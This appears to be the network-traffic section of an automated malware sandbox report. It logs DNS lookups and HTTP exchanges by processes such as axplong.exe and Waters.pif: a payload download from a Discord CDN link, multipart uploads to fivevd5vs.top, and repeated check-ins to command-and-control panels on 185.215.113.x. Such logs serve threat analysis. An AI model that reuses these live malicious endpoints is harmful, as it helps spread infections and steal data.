                                                                                                                                                Request
                                                                                                                                                POST /v1/upload.php HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Content-Type: multipart/form-data; boundary=----Boundary79302191
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 73186
                                                                                                                                                Host: fivevd5vs.top
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:09 GMT
                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://194.58.114.223/d/385121
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                194.58.114.223:80
                                                                                                                                                Request
                                                                                                                                                GET /d/385121 HTTP/1.1
                                                                                                                                                Host: 194.58.114.223
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:10 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                Location: https://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                162.159.129.233
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                162.159.130.233
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                162.159.133.233
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                162.159.135.233
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                162.159.134.233
                                                                                                                                              • flag-us
                                                                                                                                                GET
                                                                                                                                                https://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                162.159.129.233:443
                                                                                                                                                Request
                                                                                                                                                GET /attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b& HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Host: cdn.discordapp.com
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:12 GMT
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                Content-Length: 7596406
                                                                                                                                                Connection: keep-alive
                                                                                                                                                CF-Ray: 8c3e4d8ea856cd8d-LHR
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Accept-Ranges: bytes, bytes
                                                                                                                                                Age: 6969
                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                Content-Disposition: attachment; filename="setup.exe"
                                                                                                                                                ETag: "f749bd4f76ac073c55a3b937e6b7eac1"
                                                                                                                                                Expires: Tue, 16 Sep 2025 05:02:12 GMT
                                                                                                                                                Last-Modified: Mon, 16 Sep 2024 03:05:29 GMT
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                x-goog-generation: 1726455929025847
                                                                                                                                                x-goog-hash: crc32c=jw3GXw==
                                                                                                                                                x-goog-hash: md5=90m9T3asBzxVo7k35rfqwQ==
                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                x-goog-storage-class: STANDARD
                                                                                                                                                x-goog-stored-content-encoding: identity
                                                                                                                                                x-goog-stored-content-length: 7596406
                                                                                                                                                x-guploader-uploadid: AD-8ljs0l2XUZUJmIdg7bHqCaQOuqkC9iUV5YE3gaO-glU49f3iZBoAGO0JGXGmfXYFZ59MHmvGWp_iORA
                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                Set-Cookie: __cf_bm=dSDzMXUdQ0.y_NepSq_vKdqankWxaH.GQjfJRqZ4I.M-1726462932-1.0.1.1-zD5MUAgGjf1QGJg_NTi4PQHzw4866KuLWsGRnRssJG20nr_29vlFuAhnNQhg_J4tKgjXVld3l8W_SukBmxQl1A; path=/; expires=Mon, 16-Sep-24 05:32:12 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FiMiN4LY06bToEIxs8OsAnDIitljhneJMXJPmqguAGE1%2B8E6I6rNP2yIcpLIx9oihv1d2MIeqkcGu7Xr7cqYxikdHtFj45HLPAqwoxkOuwviTwlM67%2BCSdOEC2zqsF3xQhTOGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Set-Cookie: _cfuvid=znOLqr7bW2yzgDDtucQkgZpfvt5K5Js5smF.27aYN2w-1726462932303-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                Server: cloudflare
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib
                                                                                                                                                Waters.pif
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                2.exe
                                                                                                                                                Remote address:
                                                                                                                                                188.225.44.114:80
                                                                                                                                                Request
                                                                                                                                                POST /v1/upload.php HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Content-Type: multipart/form-data; boundary=----Boundary48577504
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 24106
                                                                                                                                                Host: fivevd5vs.top
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:13 GMT
                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                conditionprovice.pro
                                                                                                                                                acentric.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                conditionprovice.pro
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                conditionprovice.pro
                                                                                                                                                IN A
                                                                                                                                                81.19.139.138
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php?scr=1
                                                                                                                                                Waters.pif
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.19:80
                                                                                                                                                Request
                                                                                                                                                POST /CoreOPT/index.php?scr=1 HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----NzU2MDc=
                                                                                                                                                Host: 185.215.113.19
                                                                                                                                                Content-Length: 75759
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:36 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php
                                                                                                                                                Waters.pif
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.19:80
                                                                                                                                                Request
                                                                                                                                                POST /CoreOPT/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.19
                                                                                                                                                Content-Length: 4
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:33 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php
                                                                                                                                                Waters.pif
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.19:80
                                                                                                                                                Request
                                                                                                                                                POST /CoreOPT/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.19
                                                                                                                                                Content-Length: 156
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:34 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                service-domain.xyz
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                service-domain.xyz
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                service-domain.xyz
                                                                                                                                                IN A
                                                                                                                                                54.210.117.250
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                c.pki.goog
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                c.pki.goog
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                c.pki.goog
                                                                                                                                                IN CNAME
                                                                                                                                                pki-goog.l.google.com
                                                                                                                                                pki-goog.l.google.com
                                                                                                                                                IN A
                                                                                                                                                142.250.179.227
                                                                                                                                              • flag-gb
                                                                                                                                                GET
                                                                                                                                                http://c.pki.goog/r/r1.crl
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                142.250.179.227:80
                                                                                                                                                Request
                                                                                                                                                GET /r/r1.crl HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                                                Host: c.pki.goog
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                                Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                                Content-Length: 854
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                Server: sffe
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Date: Mon, 16 Sep 2024 04:37:43 GMT
                                                                                                                                                Expires: Mon, 16 Sep 2024 05:27:43 GMT
                                                                                                                                                Cache-Control: public, max-age=3000
                                                                                                                                                Age: 1588
                                                                                                                                                Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                                                                Content-Type: application/pkix-crl
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                o.pki.goog
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                o.pki.goog
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                o.pki.goog
                                                                                                                                                IN CNAME
                                                                                                                                                pki-goog.l.google.com
                                                                                                                                                pki-goog.l.google.com
                                                                                                                                                IN A
                                                                                                                                                142.250.179.227
                                                                                                                                              • flag-gb
                                                                                                                                                GET
                                                                                                                                                http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEGs31zQSL0RFCna%2BsoPon%2Bg%3D
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                142.250.179.227:80
                                                                                                                                                Request
                                                                                                                                                GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEGs31zQSL0RFCna%2BsoPon%2Bg%3D HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                                                Host: o.pki.goog
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: ocsp_responder
                                                                                                                                                Content-Length: 471
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Date: Mon, 16 Sep 2024 04:20:07 GMT
                                                                                                                                                Cache-Control: public, max-age=14400
                                                                                                                                                Content-Type: application/ocsp-response
                                                                                                                                                Age: 2644
                                                                                                                                              • flag-gb
                                                                                                                                                GET
                                                                                                                                                http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3D
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                142.250.179.227:80
                                                                                                                                                Request
                                                                                                                                                GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3D HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                                                Host: o.pki.goog
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: ocsp_responder
                                                                                                                                                Content-Length: 471
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Date: Mon, 16 Sep 2024 04:38:28 GMT
                                                                                                                                                Cache-Control: public, max-age=14400
                                                                                                                                                Content-Type: application/ocsp-response
                                                                                                                                                Age: 1544
                                                                                                                                              • flag-gb
                                                                                                                                                GET
                                                                                                                                                http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoX
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                142.250.179.227:80
                                                                                                                                                Request
                                                                                                                                                GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoX HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                                                Host: o.pki.goog
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: ocsp_responder
                                                                                                                                                Content-Length: 472
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Date: Mon, 16 Sep 2024 04:08:53 GMT
                                                                                                                                                Cache-Control: public, max-age=14400
                                                                                                                                                Content-Type: application/ocsp-response
                                                                                                                                                Age: 3319
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                clients2.google.com
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                clients2.google.com
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                clients2.google.com
                                                                                                                                                IN CNAME
                                                                                                                                                clients.l.google.com
                                                                                                                                                clients.l.google.com
                                                                                                                                                IN A
                                                                                                                                                216.58.204.78
                                                                                                                                              • flag-gb
                                                                                                                                                GET
                                                                                                                                                https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCR
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                216.58.204.78:443
                                                                                                                                                Request
                                                                                                                                                GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCR HTTP/1.1
                                                                                                                                                Host: clients2.google.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 302 Moved Temporarily
                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_ULCUGrRd2-DgkZJnacQTg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                Date: Mon, 16 Sep 2024 05:04:12 GMT
                                                                                                                                                Location: https://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                Server: GSE
                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                Accept-Ranges: none
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                clients2.googleusercontent.com
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                clients2.googleusercontent.com
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                clients2.googleusercontent.com
                                                                                                                                                IN CNAME
                                                                                                                                                googlehosted.l.googleusercontent.com
                                                                                                                                                googlehosted.l.googleusercontent.com
                                                                                                                                                IN A
                                                                                                                                                142.250.200.1
                                                                                                                                              • flag-gb
                                                                                                                                                GET
                                                                                                                                                https://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                142.250.200.1:443
                                                                                                                                                Request
                                                                                                                                                GET /crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Host: clients2.googleusercontent.com
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 26186
                                                                                                                                                X-GUploader-UploadID: AD-8ljvlqL7qAMgKPTnepQPyOZ3etfzI19Rjc9PZvJXEFGuj1_BSTU9jPYopGB6epH8EYMNEGi1vsxTcOg
                                                                                                                                                X-Goog-Hash: crc32c=i5zIOg==
                                                                                                                                                Server: UploadServer
                                                                                                                                                Date: Sun, 15 Sep 2024 11:25:22 GMT
                                                                                                                                                Expires: Mon, 15 Sep 2025 11:25:22 GMT
                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                Age: 63530
                                                                                                                                                Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
                                                                                                                                                ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
                                                                                                                                                Content-Type: application/x-chrome-extension
                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                api4.check-data.xyz
                                                                                                                                                rundll32.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                api4.check-data.xyz
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                api4.check-data.xyz
                                                                                                                                                IN CNAME
                                                                                                                                                checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                                                checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                                                IN A
                                                                                                                                                44.236.110.137
                                                                                                                                                checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                                                IN A
                                                                                                                                                35.160.60.134
                                                                                                                                              • flag-us
                                                                                                                                                POST
                                                                                                                                                http://api4.check-data.xyz/api2/google_api_ifi
                                                                                                                                                rundll32.exe
                                                                                                                                                Remote address:
                                                                                                                                                44.236.110.137:80
                                                                                                                                                Request
                                                                                                                                                POST /api2/google_api_ifi HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
                                                                                                                                                Host: api4.check-data.xyz
                                                                                                                                                Content-Length: 728
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:01 GMT
                                                                                                                                                Server: nginx
                                                                                                                                                Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
                                                                                                                                                Content-Length: 0
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.26/Dem7kTu/index.php
                                                                                                                                                Hkbsse.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.26:80
                                                                                                                                                Request
                                                                                                                                                POST /Dem7kTu/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.26
                                                                                                                                                Content-Length: 4
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:04:42 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.26/Dem7kTu/index.php
                                                                                                                                                Hkbsse.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.26:80
                                                                                                                                                Request
                                                                                                                                                POST /Dem7kTu/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.26
                                                                                                                                                Content-Length: 156
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:04:43 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 4
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:05:14 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 156
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:05:14 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php
                                                                                                                                                Waters.pif
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.19:80
                                                                                                                                                Request
                                                                                                                                                POST /CoreOPT/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.19
                                                                                                                                                Content-Length: 4
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:05:34 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
